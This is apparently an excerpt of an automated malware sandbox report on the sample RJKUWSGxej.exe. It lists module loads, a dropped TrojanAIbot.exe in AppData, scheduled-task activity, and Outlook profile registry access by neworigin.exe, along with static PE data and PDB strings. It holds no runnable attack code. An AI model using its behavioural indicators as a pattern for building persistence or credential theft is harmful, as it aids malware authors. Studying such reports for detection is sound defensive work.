Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Source: RJKUWSGxej.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: RJKUWSGxej.exe

Static file information: File size 2806272 > 1048576

Source: RJKUWSGxej.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x150600

Source: RJKUWSGxej.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: RJKUWSGxej.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: RJKUWSGxej.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: RJKUWSGxej.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: RJKUWSGxej.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: RJKUWSGxej.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: RJKUWSGxej.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: RJKUWSGxej.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000007.00000003.2486782688.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.7.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000007.00000003.2590581507.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2591964548.0000000001460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2614730580.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2launcher\obj\jp2launcher.pdb@@4 source: jp2launcher.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000007.00000003.2080994679.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000007.00000003.2220561155.0000000001510000.00000004.00001000.00020000.00000000.sdmp, AcroTextExtractor.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000007.00000003.2220561155.0000000001510000.00000004.00001000.00020000.00000000.sdmp, AcroTextExtractor.exe.7.dr
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000007.00000003.2243857500.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000007.00000003.2680036714.0000000000440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2674926416.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000007.00000003.2179497222.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000007.00000003.2474420614.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000007.00000003.2658462401.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000007.00000003.2506693136.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2497573438.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.7.dr
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 00000007.00000003.2564021895.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000007.00000003.2297534087.0000000001580000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000007.00000003.2087017712.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000007.00000003.2243857500.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000007.00000003.2097320751.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000007.00000003.2087017712.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000007.00000003.2590581507.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2591964548.0000000001460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2614730580.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 00000007.00000003.2564021895.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2launcher\obj\jp2launcher.pdb source: jp2launcher.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000007.00000003.2179497222.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000007.00000003.2333518130.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000007.00000003.2080994679.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000007.00000003.2680036714.0000000000440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2674926416.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000007.00000003.1997141136.00000000015B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000007.00000003.2454674548.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000007.00000003.2658462401.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: firefox.exe.7.dr
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000007.00000003.2422969543.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000007.00000003.2297534087.0000000001580000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: firefox.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000007.00000003.2436327638.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000007.00000003.2333518130.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000007.00000003.2486782688.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdateBroker.exe.7.dr
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32> source: build.exe, 0000000E.00000002.3150698705.000000000148D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000007.00000003.2474420614.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000007.00000003.1997141136.00000000015B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000007.00000003.2506693136.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2497573438.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000007.00000003.2348123603.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb8 source: javaws.exe0.7.dr
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdb source: alg.exe, 00000007.00000003.2322680790.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: alg.exe.5.dr
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: alg.exe.5.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.7.dr
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000007.00000003.2097320751.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb5hG source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbIp source: build.exe, 0000000E.00000002.3150698705.000000000148D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.7.dr
Source:	Binary string: updater.pdb source: updater.exe.7.dr
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000007.00000003.2642381591.0000000000430000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000007.00000003.2436327638.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: javaws.exe0.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000007.00000003.2348123603.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdbQ source: alg.exe, 00000007.00000003.2322680790.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000007.00000003.2642381591.0000000000430000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.7.dr

Source: RJKUWSGxej.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: RJKUWSGxej.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: RJKUWSGxej.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: RJKUWSGxej.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: RJKUWSGxej.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: build.exe.5.dr

Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]

Source: RJKUWSGxej.exe	Static PE information: section name: .managed
Source: RJKUWSGxej.exe	Static PE information: section name: hydrated
Source: RJKUWSGxej.exe.0.dr	Static PE information: section name: .managed
Source: RJKUWSGxej.exe.0.dr	Static PE information: section name: hydrated
Source: armsvc.exe.5.dr	Static PE information: section name: .didat
Source: alg.exe.5.dr	Static PE information: section name: .didat
Source: maintenanceservice.exe.7.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.7.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.7.dr	Static PE information: section name: _RDATA
Source: minidump-analyzer.exe.7.dr	Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.7.dr	Static PE information: section name: .voltbl
Source: GoogleCrashHandler64.exe.7.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.7.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.7.dr	Static PE information: section name: .gehcont
Source: GoogleUpdateComRegisterShell64.exe.7.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.7.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.7.dr	Static PE information: section name: .gehcont
Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: section name: .retplne
Source: pingsender.exe.7.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.7.dr	Static PE information: section name: .voltbl
Source: plugin-container.exe.7.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.7.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.7.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.7.dr	Static PE information: section name: .voltbl
Source: updater.exe.7.dr	Static PE information: section name: .00cfg
Source: updater.exe.7.dr	Static PE information: section name: .voltbl
Source: updater.exe.7.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.7.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.7.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.7.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.7.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.7.dr	Static PE information: section name: malloc_h
Source: unpack200.exe.7.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.7.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.7.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.7.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.7.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.7.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.7.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.7.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.7.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.7.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.7.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.7.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.7.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.7.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.7.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.7.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.7.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.7.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.7.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.7.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.7.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.7.dr	Static PE information: section name: malloc_h
Source: setup.exe.7.dr	Static PE information: section name: .00cfg
Source: setup.exe.7.dr	Static PE information: section name: .gxfg
Source: setup.exe.7.dr	Static PE information: section name: .retplne
Source: setup.exe.7.dr	Static PE information: section name: LZMADEC
Source: setup.exe.7.dr	Static PE information: section name: _RDATA
Source: setup.exe.7.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.7.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.7.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.7.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.7.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.7.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.7.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.7.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.7.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.7.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.7.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.7.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.7.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.7.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.7.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.7.dr	Static PE information: section name: .retplne
